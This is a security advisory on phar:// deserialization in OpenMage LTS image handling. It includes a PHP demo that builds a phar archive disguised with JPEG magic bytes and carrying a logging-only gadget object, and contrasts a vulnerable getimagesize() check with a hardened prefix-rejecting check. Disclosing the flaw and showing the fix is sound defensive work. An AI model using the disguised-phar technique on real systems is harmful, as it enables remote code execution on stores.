PHP filesystem functions such as getimagesize(), file_exists(), and is_readable() honour the phar:// stream wrapper. Opening an archive through that wrapper parses its manifest and, in PHP releases before 8.0, unserializes the archive's metadata before the function inspects any content, so the call does not have to succeed (getimagesize() may still return false) for the deserialization to have happened. The archive does not need a .phar extension when it is referenced through phar://, and its stub may begin with arbitrary bytes, so a phar file can be given image magic bytes to pass content sniffing. OpenMage LTS passes potentially attacker-controlled file paths to these functions during image validation and media handling. An attacker who can upload a phar archive disguised as an image and cause one of these functions to be called with a phar:// path pointing at it can reach the metadata deserialization and, given a suitable gadget chain, achieve arbitrary code execution.
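The following PHP script is an added example that is not OpenMage code and does not reproduce the project's fix. It builds a phar whose stub starts with JPEG magic bytes, stores a hypothetical gadget object (DemoGadget, which only logs instead of doing anything dangerous) in the metadata, and contrasts an image check that calls getimagesize() on the raw path, as the vulnerable pattern does, with a hardened variant that rejects stream-wrapper prefixes and resolves the path first. The temporary file names are assumptions; run it with `php -d phar.readonly=0` because creating the archive requires that setting (reading it via phar:// does not).

```php
<?php
// Added example, not OpenMage code. Run: php -d phar.readonly=0 phar_demo.php
// On PHP < 8.0 the gadget's __destruct() fires from getimagesize() alone;
// PHP 8.0+ no longer unserializes phar metadata through the stream wrapper,
// so there only the hardened check is exercised.

// Hypothetical gadget class standing in for a real application class whose
// destructor does something dangerous. This one only logs.
class DemoGadget
{
    public $cmd = 'id';

    public function __destruct()
    {
        echo "[gadget] __destruct() reached with cmd={$this->cmd}\n";
    }
}

// Build a phar at $pharPath. The Phar constructor insists on a .phar
// extension, so the caller renames the file afterwards; the phar:// wrapper
// does not care about the extension.
function buildDisguisedPhar(string $pharPath): void
{
    @unlink($pharPath);
    $phar = new Phar($pharPath);
    $phar->startBuffering();
    // A stub beginning with JPEG magic (FF D8 FF) so a check that sniffs only
    // the leading bytes treats the file as an image. The stub still has to
    // end with __HALT_COMPILER(); for the archive to be valid.
    $phar->setStub("\xFF\xD8\xFF\xE0 <?php __HALT_COMPILER(); ?>");
    $phar->addFromString('test.txt', 'x');
    // setMetadata() serializes the object into the manifest. This instance is
    // destroyed when $phar goes out of scope, which prints one "[gadget]" line
    // at build time; the interesting one comes later from the unserialized copy.
    $phar->setMetadata(new DemoGadget());
    $phar->stopBuffering();
}

// Vulnerable pattern: the path reaches getimagesize() untouched, so a
// phar:// prefix selects the phar wrapper and the metadata is unserialized
// before getimagesize() decides whether the bytes are an image.
function vulnerableImageCheck(string $path): bool
{
    return @getimagesize($path) !== false;
}

// Hardened pattern (my suggestion, not the project's patch): refuse any
// scheme prefix, not only a literal "phar://" (the match is case-insensitive,
// so "PHAR://" is caught too), then resolve the path and require a regular
// file before letting getimagesize() see it.
function hardenedImageCheck(string $path): bool
{
    if (preg_match('#^[a-z][a-z0-9+.\-]*://#i', $path)) {
        return false;
    }
    $real = realpath($path);
    if ($real === false || !is_file($real)) {
        return false;
    }
    return @getimagesize($real) !== false;
}

$pharPath = sys_get_temp_dir() . '/demo.phar'; // assumed temporary locations
$jpgPath  = sys_get_temp_dir() . '/demo.jpg';

buildDisguisedPhar($pharPath);
rename($pharPath, $jpgPath);
echo "[build] archive written to $jpgPath\n";

echo "[vulnerable] calling getimagesize() on phar://{$jpgPath}\n";
vulnerableImageCheck('phar://' . $jpgPath);   // PHP < 8.0: "[gadget]" line appears here

echo "[hardened] same path through the wrapper-rejecting check\n";
var_dump(hardenedImageCheck('phar://' . $jpgPath)); // rejected before any wrapper is opened

echo "[hardened] plain path, no wrapper\n";
var_dump(hardenedImageCheck($jpgPath)); // file is opened as a regular file only
```

The regular expression rejects every `scheme://` prefix rather than only `phar://` because PHP ships several other wrappers and a substring check is easy to bypass with case changes or an alternative scheme; resolving with realpath() afterwards also strips any remaining indirection before the resolved path is handed to getimagesize(). On PHP 8.0 and later the wrapper no longer unserializes metadata on open, so upgrading PHP removes this particular trigger even where the path is still unvalidated.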
| Metric | Value | Justification |
| ------------------------ | --------- | ------------------------------------------------ |
| Attack Vector (AV) | Network | Exploitable via file upload and web requests |
| Attack Complexity (AC) | High | Requires file upload + triggering phar:// access |
| Privileges Required (PR) | None | Some upload vectors don't require authentication |
| User Interaction (UI) | None | Exploitation is automatic once triggered |
| Scope (S) | Unchanged | Impacts the vulnerable component |
| Confidentiality (C) | High | Full system access via RCE |
| Integrity (I) | High | Arbitrary code execution |
| Availability (A) | High | Complete system compromise possible |
| File | Line | Vulnerable Function |
| --------------------------------------------------------- | ---- | ---------------------------------------------- |
| app/code/core/Mage/Core/Model/File/Validator/Image.php | 72 | getimagesize($filePath) |
| app/code/core/Mage/Cms/Model/Wysiwyg/Images/Storage.php | 137 | getimagesize($item->getFilename()) |
| lib/Varien/Image.php... | | |
20.17.0

CVSS v3.1 base score: 8.1 (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)